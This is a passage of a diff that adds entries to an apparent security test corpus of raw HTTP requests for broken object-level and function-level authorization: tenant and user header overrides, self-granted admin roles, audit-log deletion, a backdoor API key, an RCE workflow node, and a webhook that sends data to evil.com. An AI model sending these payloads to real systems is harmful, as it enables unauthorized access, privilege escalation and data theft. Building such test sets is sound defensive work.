+
"notes": "BOLA - Account ID override via header",
|
|
503
|
+
"destructive": false,
|
|
504
|
+
"category": "Logic"
|
|
505
|
+
},
|
|
506
|
+
{
|
|
507
|
+
"id": "BOLA-HEADER-003",
|
|
508
|
+
"payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nX-Tenant-ID: other-tenant\r\n\r\n",
|
|
509
|
+
"tags": ["bola", "header-injection", "tenant", "critical"],
|
|
510
|
+
"expected_block": true,
|
|
511
|
+
"severity_hint": "Critical",
|
|
512
|
+
"notes": "BOLA - Tenant ID override via header",
|
|
513
|
+
"destructive": false,
|
|
514
|
+
"category": "Logic"
|
|
515
|
+
},
|
|
516
|
+
{
|
|
517
|
+
"id": "BOLA-HEADER-004",
|
|
518
|
+
"payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nX-Original-User: admin\r\n\r\n",
|
|
519
|
+
"tags": ["bola", "header-injection", "impersonation", "critical"],
|
|
520
|
+
"expected_block": true,
|
|
521
|
+
"severity_hint": "Critical",
|
|
522
|
+
"notes": "BOLA - User impersonation via header",
|
|
523
|
+
"destructive": false,
|
|
524
|
+
"category": "Logic"
|
|
525
|
+
},
|
|
526
|
+
{
|
|
527
|
+
"id": "BFLA-ROLE-001",
|
|
528
|
+
"payload": "DELETE /api/admin/users/5 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
529
|
+
"tags": ["bfla", "admin-function", "user-deletion", "critical"],
|
|
530
|
+
"expected_block": true,
|
|
531
|
+
"severity_hint": "Critical",
|
|
532
|
+
"notes": "BFLA - Regular user calling admin delete endpoint",
|
|
533
|
+
"destructive": true,
|
|
534
|
+
"category": "Logic"
|
|
535
|
+
},
|
|
536
|
+
{
|
|
537
|
+
"id": "BFLA-ROLE-002",
|
|
538
|
+
"payload": "POST /api/admin/settings HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"debug_mode\":true}",
|
|
539
|
+
"tags": ["bfla", "admin-function", "settings", "critical"],
|
|
540
|
+
"expected_block": true,
|
|
541
|
+
"severity_hint": "Critical",
|
|
542
|
+
"notes": "BFLA - Regular user modifying admin settings",
|
|
543
|
+
"destructive": true,
|
|
544
|
+
"category": "Logic"
|
|
545
|
+
},
|
|
546
|
+
{
|
|
547
|
+
"id": "BFLA-ROLE-003",
|
|
548
|
+
"payload": "POST /api/users/1/role HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"role\":\"admin\"}",
|
|
549
|
+
"tags": ["bfla", "privilege-escalation", "role-change", "critical"],
|
|
550
|
+
"expected_block": true,
|
|
551
|
+
"severity_hint": "Critical",
|
|
552
|
+
"notes": "BFLA - Self-elevation to admin role",
|
|
553
|
+
"destructive": true,
|
|
554
|
+
"category": "Logic"
|
|
555
|
+
},
|
|
556
|
+
{
|
|
557
|
+
"id": "BFLA-ROLE-004",
|
|
558
|
+
"payload": "PUT /api/permissions HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"user_id\":\"me\",\"permissions\":[\"read\",\"write\",\"admin\"]}",
|
|
559
|
+
"tags": ["bfla", "privilege-escalation", "permissions", "critical"],
|
|
560
|
+
"expected_block": true,
|
|
561
|
+
"severity_hint": "Critical",
|
|
562
|
+
"notes": "BFLA - Self-granting additional permissions",
|
|
563
|
+
"destructive": true,
|
|
564
|
+
"category": "Logic"
|
|
565
|
+
},
|
|
566
|
+
{
|
|
567
|
+
"id": "BFLA-ROLE-005",
|
|
568
|
+
"payload": "POST /api/system/backup HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
569
|
+
"tags": ["bfla", "admin-function", "backup", "critical"],
|
|
570
|
+
"expected_block": true,
|
|
571
|
+
"severity_hint": "Critical",
|
|
572
|
+
"notes": "BFLA - Triggering system backup (admin function)",
|
|
573
|
+
"destructive": false,
|
|
574
|
+
"category": "Logic"
|
|
575
|
+
},
|
|
576
|
+
{
|
|
577
|
+
"id": "BFLA-ROLE-006",
|
|
578
|
+
"payload": "POST /api/system/restore HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"backup_id\":\"latest\"}",
|
|
579
|
+
"tags": ["bfla", "admin-function", "restore", "critical"],
|
|
580
|
+
"expected_block": true,
|
|
581
|
+
"severity_hint": "Critical",
|
|
582
|
+
"notes": "BFLA - Triggering system restore (admin function)",
|
|
583
|
+
"destructive": true,
|
|
584
|
+
"category": "Logic"
|
|
585
|
+
},
|
|
586
|
+
{
|
|
587
|
+
"id": "BFLA-ROLE-007",
|
|
588
|
+
"payload": "GET /api/admin/audit-logs HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
589
|
+
"tags": ["bfla", "admin-function", "audit-logs", "critical"],
|
|
590
|
+
"expected_block": true,
|
|
591
|
+
"severity_hint": "Critical",
|
|
592
|
+
"notes": "BFLA - Accessing admin audit logs",
|
|
593
|
+
"destructive": false,
|
|
594
|
+
"category": "Logic"
|
|
595
|
+
},
|
|
596
|
+
{
|
|
597
|
+
"id": "BFLA-ROLE-008",
|
|
598
|
+
"payload": "DELETE /api/admin/audit-logs HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
599
|
+
"tags": ["bfla", "admin-function", "log-tampering", "critical"],
|
|
600
|
+
"expected_block": true,
|
|
601
|
+
"severity_hint": "Critical",
|
|
602
|
+
"notes": "BFLA - Deleting audit logs (evidence destruction)",
|
|
603
|
+
"destructive": true,
|
|
604
|
+
"category": "Logic"
|
|
605
|
+
},
|
|
606
|
+
{
|
|
607
|
+
"id": "BFLA-ROLE-009",
|
|
608
|
+
"payload": "POST /api/invites HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"email\":\"attacker@evil.com\",\"role\":\"admin\"}",
|
|
609
|
+
"tags": ["bfla", "invite-abuse", "admin-invite", "critical"],
|
|
610
|
+
"expected_block": true,
|
|
611
|
+
"severity_hint": "Critical",
|
|
612
|
+
"notes": "BFLA - Creating admin-level invite",
|
|
613
|
+
"destructive": true,
|
|
614
|
+
"category": "Logic"
|
|
615
|
+
},
|
|
616
|
+
{
|
|
617
|
+
"id": "BFLA-ROLE-010",
|
|
618
|
+
"payload": "POST /api/api-keys HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"name\":\"backdoor\",\"scopes\":[\"admin:*\"]}",
|
|
619
|
+
"tags": ["bfla", "api-key-abuse", "admin-scope", "critical"],
|
|
620
|
+
"expected_block": true,
|
|
621
|
+
"severity_hint": "Critical",
|
|
622
|
+
"notes": "BFLA - Creating API key with admin scopes",
|
|
623
|
+
"destructive": true,
|
|
624
|
+
"category": "Logic"
|
|
625
|
+
},
|
|
626
|
+
{
|
|
627
|
+
"id": "BFLA-METHOD-001",
|
|
628
|
+
"payload": "PUT /api/users/1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer other_user_token\r\nContent-Type: application/json\r\n\r\n{\"name\":\"Hacked\"}",
|
|
629
|
+
"tags": ["bfla", "method-override", "put", "critical"],
|
|
630
|
+
"expected_block": true,
|
|
631
|
+
"severity_hint": "Critical",
|
|
632
|
+
"notes": "BFLA - PUT method to modify another user's data",
|
|
633
|
+
"destructive": true,
|
|
634
|
+
"category": "Logic"
|
|
635
|
+
},
|
|
636
|
+
{
|
|
637
|
+
"id": "BFLA-METHOD-002",
|
|
638
|
+
"payload": "PATCH /api/users/1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer other_user_token\r\nContent-Type: application/json\r\n\r\n{\"email\":\"attacker@evil.com\"}",
|
|
639
|
+
"tags": ["bfla", "method-override", "patch", "critical"],
|
|
640
|
+
"expected_block": true,
|
|
641
|
+
"severity_hint": "Critical",
|
|
642
|
+
"notes": "BFLA - PATCH to change another user's email",
|
|
643
|
+
"destructive": true,
|
|
644
|
+
"category": "Logic"
|
|
645
|
+
},
|
|
646
|
+
{
|
|
647
|
+
"id": "BFLA-METHOD-003",
|
|
648
|
+
"payload": "POST /api/users/1 HTTP/1.1\r\nHost: target.com\r\nX-HTTP-Method-Override: DELETE\r\nAuthorization: Bearer other_user_token\r\n\r\n",
|
|
649
|
+
"tags": ["bfla", "method-override-header", "delete", "critical"],
|
|
650
|
+
"expected_block": true,
|
|
651
|
+
"severity_hint": "Critical",
|
|
652
|
+
"notes": "BFLA - Method override header to DELETE",
|
|
653
|
+
"destructive": true,
|
|
654
|
+
"category": "Logic"
|
|
655
|
+
},
|
|
656
|
+
{
|
|
657
|
+
"id": "BFLA-METHOD-004",
|
|
658
|
+
"payload": "POST /api/users/1?_method=DELETE HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer other_user_token\r\n\r\n",
|
|
659
|
+
"tags": ["bfla", "method-override-param", "delete", "critical"],
|
|
660
|
+
"expected_block": true,
|
|
661
|
+
"severity_hint": "Critical",
|
|
662
|
+
"notes": "BFLA - _method parameter override",
|
|
663
|
+
"destructive": true,
|
|
664
|
+
"category": "Logic"
|
|
665
|
+
},
|
|
666
|
+
{
|
|
667
|
+
"id": "BFLA-WORKFLOW-001",
|
|
668
|
+
"payload": "POST /api/workflows/1/activate HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer other_user_token\r\n\r\n",
|
|
669
|
+
"tags": ["bfla", "n8n", "workflow-activate", "critical"],
|
|
670
|
+
"expected_block": true,
|
|
671
|
+
"severity_hint": "Critical",
|
|
672
|
+
"notes": "BFLA - Activating another user's workflow (n8n)",
|
|
673
|
+
"destructive": true,
|
|
674
|
+
"category": "Logic"
|
|
675
|
+
},
|
|
676
|
+
{
|
|
677
|
+
"id": "BFLA-WORKFLOW-002",
|
|
678
|
+
"payload": "POST /api/workflows/1/execute HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer other_user_token\r\n\r\n",
|
|
679
|
+
"tags": ["bfla", "n8n", "workflow-execute", "critical"],
|
|
680
|
+
"expected_block": true,
|
|
681
|
+
"severity_hint": "Critical",
|
|
682
|
+
"notes": "BFLA - Executing another user's workflow (n8n)",
|
|
683
|
+
"destructive": true,
|
|
684
|
+
"category": "Logic"
|
|
685
|
+
},
|
|
686
|
+
{
|
|
687
|
+
"id": "BFLA-WORKFLOW-003",
|
|
688
|
+
"payload": "PUT /api/workflows/1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer other_user_token\r\nContent-Type: application/json\r\n\r\n{\"nodes\":[{\"type\":\"execute-command\",\"command\":\"id\"}]}",
|
|
689
|
+
"tags": ["bfla", "n8n", "workflow-modify", "rce", "critical"],
|
|
690
|
+
"expected_block": true,
|
|
691
|
+
"severity_hint": "Critical",
|
|
692
|
+
"notes": "BFLA - Modifying workflow to inject RCE node",
|
|
693
|
+
"destructive": true,
|
|
694
|
+
"category": "Logic"
|
|
695
|
+
},
|
|
696
|
+
{
|
|
697
|
+
"id": "BOLA-GUID-001",
|
|
698
|
+
"payload": "GET /api/documents/550e8400-e29b-41d4-a716-446655440000 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
699
|
+
"tags": ["bola", "guid", "uuid-enum", "high"],
|
|
700
|
+
"expected_block": true,
|
|
701
|
+
"severity_hint": "High",
|
|
702
|
+
"notes": "BOLA - Attempting access with valid-looking UUID",
|
|
703
|
+
"destructive": false,
|
|
704
|
+
"category": "Logic"
|
|
705
|
+
},
|
|
706
|
+
{
|
|
707
|
+
"id": "BOLA-GUID-002",
|
|
708
|
+
"payload": "GET /api/documents/00000000-0000-0000-0000-000000000000 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
709
|
+
"tags": ["bola", "guid", "null-uuid", "high"],
|
|
710
|
+
"expected_block": true,
|
|
711
|
+
"severity_hint": "High",
|
|
712
|
+
"notes": "BOLA - Null UUID access attempt",
|
|
713
|
+
"destructive": false,
|
|
714
|
+
"category": "Logic"
|
|
715
|
+
},
|
|
716
|
+
{
|
|
717
|
+
"id": "BOLA-GUID-003",
|
|
718
|
+
"payload": "GET /api/documents/ffffffff-ffff-ffff-ffff-ffffffffffff HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
719
|
+
"tags": ["bola", "guid", "max-uuid", "high"],
|
|
720
|
+
"expected_block": true,
|
|
721
|
+
"severity_hint": "High",
|
|
722
|
+
"notes": "BOLA - Max value UUID access attempt",
|
|
723
|
+
"destructive": false,
|
|
724
|
+
"category": "Logic"
|
|
725
|
+
},
|
|
726
|
+
{
|
|
727
|
+
"id": "BOLA-SLUG-001",
|
|
728
|
+
"payload": "GET /api/posts/admin-secret-post HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
729
|
+
"tags": ["bola", "slug", "guessable", "high"],
|
|
730
|
+
"expected_block": true,
|
|
731
|
+
"severity_hint": "High",
|
|
732
|
+
"notes": "BOLA - Accessing post via guessable slug",
|
|
733
|
+
"destructive": false,
|
|
734
|
+
"category": "Logic"
|
|
735
|
+
},
|
|
736
|
+
{
|
|
737
|
+
"id": "BOLA-SLUG-002",
|
|
738
|
+
"payload": "GET /api/workspaces/company-internal HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
739
|
+
"tags": ["bola", "slug", "workspace", "critical"],
|
|
740
|
+
"expected_block": true,
|
|
741
|
+
"severity_hint": "Critical",
|
|
742
|
+
"notes": "BOLA - Accessing workspace via guessable name",
|
|
743
|
+
"destructive": false,
|
|
744
|
+
"category": "Logic"
|
|
745
|
+
},
|
|
746
|
+
{
|
|
747
|
+
"id": "BOLA-EMAIL-001",
|
|
748
|
+
"payload": "GET /api/users?email=admin@company.com HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
749
|
+
"tags": ["bola", "email-lookup", "pii", "critical"],
|
|
750
|
+
"expected_block": true,
|
|
751
|
+
"severity_hint": "Critical",
|
|
752
|
+
"notes": "BOLA - User lookup by email address",
|
|
753
|
+
"destructive": false,
|
|
754
|
+
"category": "Logic"
|
|
755
|
+
},
|
|
756
|
+
{
|
|
757
|
+
"id": "BOLA-EMAIL-002",
|
|
758
|
+
"payload": "GET /api/users/by-email/admin@company.com HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
759
|
+
"tags": ["bola", "email-lookup", "path-based", "critical"],
|
|
760
|
+
"expected_block": true,
|
|
761
|
+
"severity_hint": "Critical",
|
|
762
|
+
"notes": "BOLA - User lookup via email in path",
|
|
763
|
+
"destructive": false,
|
|
764
|
+
"category": "Logic"
|
|
765
|
+
},
|
|
766
|
+
{
|
|
767
|
+
"id": "BOLA-PHONE-001",
|
|
768
|
+
"payload": "GET /api/users?phone=+1234567890 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
769
|
+
"tags": ["bola", "phone-lookup", "pii", "critical"],
|
|
770
|
+
"expected_block": true,
|
|
771
|
+
"severity_hint": "Critical",
|
|
772
|
+
"notes": "BOLA - User lookup by phone number",
|
|
773
|
+
"destructive": false,
|
|
774
|
+
"category": "Logic"
|
|
775
|
+
},
|
|
776
|
+
{
|
|
777
|
+
"id": "BOLA-BATCH-001",
|
|
778
|
+
"payload": "POST /api/users/batch HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\nContent-Type: application/json\r\n\r\n{\"ids\":[1,2,3,4,5,6,7,8,9,10]}",
|
|
779
|
+
"tags": ["bola", "batch", "mass-enum", "critical"],
|
|
780
|
+
"expected_block": true,
|
|
781
|
+
"severity_hint": "Critical",
|
|
782
|
+
"notes": "BOLA - Batch request to enumerate multiple users",
|
|
783
|
+
"destructive": false,
|
|
784
|
+
"category": "Logic"
|
|
785
|
+
},
|
|
786
|
+
{
|
|
787
|
+
"id": "BOLA-BATCH-002",
|
|
788
|
+
"payload": "GET /api/documents?ids=1,2,3,4,5,6,7,8,9,10 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
789
|
+
"tags": ["bola", "batch", "query-array", "critical"],
|
|
790
|
+
"expected_block": true,
|
|
791
|
+
"severity_hint": "Critical",
|
|
792
|
+
"notes": "BOLA - Multiple IDs in query parameter",
|
|
793
|
+
"destructive": false,
|
|
794
|
+
"category": "Logic"
|
|
795
|
+
},
|
|
796
|
+
{
|
|
797
|
+
"id": "BOLA-FILTER-001",
|
|
798
|
+
"payload": "GET /api/transactions?user_id=1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
799
|
+
"tags": ["bola", "filter-bypass", "user-id", "critical"],
|
|
800
|
+
"expected_block": true,
|
|
801
|
+
"severity_hint": "Critical",
|
|
802
|
+
"notes": "BOLA - Filtering by another user's ID",
|
|
803
|
+
"destructive": false,
|
|
804
|
+
"category": "Logic"
|
|
805
|
+
},
|
|
806
|
+
{
|
|
807
|
+
"id": "BOLA-FILTER-002",
|
|
808
|
+
"payload": "GET /api/orders?customer_id=1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
809
|
+
"tags": ["bola", "filter-bypass", "customer-id", "critical"],
|
|
810
|
+
"expected_block": true,
|
|
811
|
+
"severity_hint": "Critical",
|
|
812
|
+
"notes": "BOLA - Filtering orders by customer ID",
|
|
813
|
+
"destructive": false,
|
|
814
|
+
"category": "Logic"
|
|
815
|
+
},
|
|
816
|
+
{
|
|
817
|
+
"id": "BOLA-FILTER-003",
|
|
818
|
+
"payload": "GET /api/events?owner_id=admin HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
819
|
+
"tags": ["bola", "filter-bypass", "owner-id", "critical"],
|
|
820
|
+
"expected_block": true,
|
|
821
|
+
"severity_hint": "Critical",
|
|
822
|
+
"notes": "BOLA - Filtering events by owner ID",
|
|
823
|
+
"destructive": false,
|
|
824
|
+
"category": "Logic"
|
|
825
|
+
},
|
|
826
|
+
{
|
|
827
|
+
"id": "BOLA-NESTED-001",
|
|
828
|
+
"payload": "GET /api/organizations/1/projects/2/tasks/3 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
829
|
+
"tags": ["bola", "nested-resource", "deep-access", "critical"],
|
|
830
|
+
"expected_block": true,
|
|
831
|
+
"severity_hint": "Critical",
|
|
832
|
+
"notes": "BOLA - Deep nested resource access",
|
|
833
|
+
"destructive": false,
|
|
834
|
+
"category": "Logic"
|
|
835
|
+
},
|
|
836
|
+
{
|
|
837
|
+
"id": "BOLA-NESTED-002",
|
|
838
|
+
"payload": "GET /api/users/1/wallets/2/transactions/3 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
839
|
+
"tags": ["bola", "nested-resource", "financial", "critical"],
|
|
840
|
+
"expected_block": true,
|
|
841
|
+
"severity_hint": "Critical",
|
|
842
|
+
"notes": "BOLA - Nested financial resource access",
|
|
843
|
+
"destructive": false,
|
|
844
|
+
"category": "Logic"
|
|
845
|
+
},
|
|
846
|
+
{
|
|
847
|
+
"id": "BFLA-IMPERSONATE-001",
|
|
848
|
+
"payload": "POST /api/admin/impersonate HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"target_user_id\":1}",
|
|
849
|
+
"tags": ["bfla", "impersonation", "admin-function", "critical"],
|
|
850
|
+
"expected_block": true,
|
|
851
|
+
"severity_hint": "Critical",
|
|
852
|
+
"notes": "BFLA - Regular user attempting impersonation",
|
|
853
|
+
"destructive": false,
|
|
854
|
+
"category": "Logic"
|
|
855
|
+
},
|
|
856
|
+
{
|
|
857
|
+
"id": "BFLA-IMPERSONATE-002",
|
|
858
|
+
"payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nX-Impersonate-User: admin\r\n\r\n",
|
|
859
|
+
"tags": ["bfla", "impersonation", "header", "critical"],
|
|
860
|
+
"expected_block": true,
|
|
861
|
+
"severity_hint": "Critical",
|
|
862
|
+
"notes": "BFLA - Impersonation via header",
|
|
863
|
+
"destructive": false,
|
|
864
|
+
"category": "Logic"
|
|
865
|
+
},
|
|
866
|
+
{
|
|
867
|
+
"id": "BFLA-EXPORT-001",
|
|
868
|
+
"payload": "POST /api/admin/export/users HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
869
|
+
"tags": ["bfla", "export", "bulk-data", "critical"],
|
|
870
|
+
"expected_block": true,
|
|
871
|
+
"severity_hint": "Critical",
|
|
872
|
+
"notes": "BFLA - Exporting all user data (admin function)",
|
|
873
|
+
"destructive": false,
|
|
874
|
+
"category": "Logic"
|
|
875
|
+
},
|
|
876
|
+
{
|
|
877
|
+
"id": "BFLA-EXPORT-002",
|
|
878
|
+
"payload": "GET /api/admin/reports/financial HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
879
|
+
"tags": ["bfla", "report", "financial", "critical"],
|
|
880
|
+
"expected_block": true,
|
|
881
|
+
"severity_hint": "Critical",
|
|
882
|
+
"notes": "BFLA - Accessing financial reports",
|
|
883
|
+
"destructive": false,
|
|
884
|
+
"category": "Logic"
|
|
885
|
+
},
|
|
886
|
+
{
|
|
887
|
+
"id": "BFLA-CONFIG-001",
|
|
888
|
+
"payload": "GET /api/admin/config HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
889
|
+
"tags": ["bfla", "config", "sensitive", "critical"],
|
|
890
|
+
"expected_block": true,
|
|
891
|
+
"severity_hint": "Critical",
|
|
892
|
+
"notes": "BFLA - Accessing system configuration",
|
|
893
|
+
"destructive": false,
|
|
894
|
+
"category": "Logic"
|
|
895
|
+
},
|
|
896
|
+
{
|
|
897
|
+
"id": "BFLA-CONFIG-002",
|
|
898
|
+
"payload": "PUT /api/admin/config HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"feature_flag\":\"allow_public_signup\",\"value\":true}",
|
|
899
|
+
"tags": ["bfla", "config-modify", "feature-flag", "critical"],
|
|
900
|
+
"expected_block": true,
|
|
901
|
+
"severity_hint": "Critical",
|
|
902
|
+
"notes": "BFLA - Modifying feature flags",
|
|
903
|
+
"destructive": true,
|
|
904
|
+
"category": "Logic"
|
|
905
|
+
},
|
|
906
|
+
{
|
|
907
|
+
"id": "BFLA-WEBHOOK-001",
|
|
908
|
+
"payload": "POST /api/admin/webhooks HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"url\":\"https://evil.com/exfil\",\"events\":[\"user.created\",\"order.completed\"]}",
|
|
909
|
+
"tags": ["bfla", "webhook", "data-exfil", "critical"],
|
|
910
|
+
"expected_block": true,
|
|
911
|
+
"severity_hint": "Critical",
|
|
912
|
+
"notes": "BFLA - Creating webhook for data exfiltration",
|
|
913
|
+
"destructive": true,
|
|
914
|
+
"category": "Logic"
|
|
915
|
+
},
|
|
916
|
+
{
|
|
917
|
+
"id": "BFLA-DEBUG-001",
|
|
918
|
+
"payload": "GET /api/debug/info HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\n\r\n",
|
|
919
|
+
"tags": ["bfla", "debug", "info-disclosure", "high"],
|
|
920
|
+
"expected_block": true,
|
|
921
|
+
"severity_hint": "High",
|
|
922
|
+
"notes": "BFLA - Accessing debug information",
|
|
923
|
+
"destructive": false,
|
|
924
|
+
"category": "Logic"
|
|
925
|
+
},
|
|
926
|
+
{
|
|
927
|
+
"id": "BFLA-DEBUG-002",
|
|
928
|
+
"payload": "POST /api/debug/sql HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"query\":\"SELECT * FROM users\"}",
|
|
929
|
+
"tags": ["bfla", "debug", "sql-console", "critical"],
|
|
930
|
+
"expected_block": true,
|
|
931
|
+
"severity_hint": "Critical",
|
|
932
|
+
"notes": "BFLA - Accessing debug SQL console",
|
|
933
|
+
"destructive": false,
|
|
934
|
+
"category": "Logic"
|
|
935
|
+
},
|
|
936
|
+
{
|
|
937
|
+
"id": "BOLA-VERSION-001",
|
|
938
|
+
"payload": "GET /api/v1/users/1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
939
|
+
"tags": ["bola", "api-version", "v1", "high"],
|
|
940
|
+
"expected_block": true,
|
|
941
|
+
"severity_hint": "High",
|
|
942
|
+
"notes": "BOLA - Testing old API version for weaker auth",
|
|
943
|
+
"destructive": false,
|
|
944
|
+
"category": "Logic"
|
|
945
|
+
},
|
|
946
|
+
{
|
|
947
|
+
"id": "BOLA-VERSION-002",
|
|
948
|
+
"payload": "GET /api/beta/users/1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
949
|
+
"tags": ["bola", "api-version", "beta", "high"],
|
|
950
|
+
"expected_block": true,
|
|
951
|
+
"severity_hint": "High",
|
|
952
|
+
"notes": "BOLA - Testing beta API for weaker auth",
|
|
953
|
+
"destructive": false,
|
|
954
|
+
"category": "Logic"
|
|
955
|
+
},
|
|
956
|
+
{
|
|
957
|
+
"id": "BOLA-VERSION-003",
|
|
958
|
+
"payload": "GET /api/internal/users/1 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
959
|
+
"tags": ["bola", "internal-api", "critical"],
|
|
960
|
+
"expected_block": true,
|
|
961
|
+
"severity_hint": "Critical",
|
|
962
|
+
"notes": "BOLA - Testing internal API endpoint",
|
|
963
|
+
"destructive": false,
|
|
964
|
+
"category": "Logic"
|
|
965
|
+
},
|
|
966
|
+
{
|
|
967
|
+
"id": "BOLA-SHARE-001",
|
|
968
|
+
"payload": "GET /api/shares/abc123 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
969
|
+
"tags": ["bola", "share-token", "guessable", "high"],
|
|
970
|
+
"expected_block": false,
|
|
971
|
+
"severity_hint": "High",
|
|
972
|
+
"notes": "BOLA - Accessing shared resource via weak token",
|
|
973
|
+
"destructive": false,
|
|
974
|
+
"category": "Logic"
|
|
975
|
+
},
|
|
976
|
+
{
|
|
977
|
+
"id": "BOLA-SHARE-002",
|
|
978
|
+
"payload": "GET /api/public-links/12345 HTTP/1.1\r\nHost: target.com\r\n\r\n",
|
|
979
|
+
"tags": ["bola", "public-link", "sequential", "high"],
|
|
980
|
+
"expected_block": true,
|
|
981
|
+
"severity_hint": "High",
|
|
982
|
+
"notes": "BOLA - Sequential public link enumeration",
|
|
983
|
+
"destructive": false,
|
|
984
|
+
"category": "Logic"
|
|
985
|
+
},
|
|
986
|
+
{
|
|
987
|
+
"id": "BFLA-BULK-001",
|
|
988
|
+
"payload": "POST /api/admin/users/bulk-delete HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"user_ids\":[1,2,3,4,5]}",
|
|
989
|
+
"tags": ["bfla", "bulk-operation", "mass-delete", "critical"],
|
|
990
|
+
"expected_block": true,
|
|
991
|
+
"severity_hint": "Critical",
|
|
992
|
+
"notes": "BFLA - Bulk delete operation (admin function)",
|
|
993
|
+
"destructive": true,
|
|
994
|
+
"category": "Logic"
|
|
995
|
+
},
|
|
996
|
+
{
|
|
997
|
+
"id": "BFLA-BULK-002",
|
|
998
|
+
"payload": "POST /api/admin/users/bulk-update HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer regular_user_token\r\nContent-Type: application/json\r\n\r\n{\"user_ids\":[1,2,3],\"update\":{\"role\":\"guest\"}}",
|
|
999
|
+
"tags": ["bfla", "bulk-operation", "mass-update", "critical"],
|
|
1000
|
+
"expected_block": true,
|
|
1001
|
+
"severity_hint": "Critical",
|
|
1002
|
+
"notes": "BFLA - Bulk role update (admin function)",
|
|
1003
|
+
"destructive": true,
|
|
1004
|
+
"category": "Logic"
|
|
1005
|
+
},
|
|
1006
|
+
{
|
|
1007
|
+
"id": "BOLA-REFERENCE-001",
|
|
1008
|
+
"payload": "GET /api/documents?ref=DOC-2024-0001 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
1009
|
+
"tags": ["bola", "reference-number", "sequential", "high"],
|
|
1010
|
+
"expected_block": true,
|
|
1011
|
+
"severity_hint": "High",
|
|
1012
|
+
"notes": "BOLA - Sequential reference number access",
|
|
1013
|
+
"destructive": false,
|
|
1014
|
+
"category": "Logic"
|
|
1015
|
+
},
|
|
1016
|
+
{
|
|
1017
|
+
"id": "BOLA-REFERENCE-002",
|
|
1018
|
+
"payload": "GET /api/invoices/INV-2024-00001 HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer attacker_token\r\n\r\n",
|
|
1019
|
+
"tags": ["bola", "invoice-number", "financial", "critical"],
|
|
1020
|
+
"expected_block": true,
|
|
1021
|
+
"severity_hint": "Critical",
|
|
1022
|
+
"notes": "BOLA - Invoice access via reference number",
|
|
1023
|
+
"destructive": false,
|
|
1024
|
+
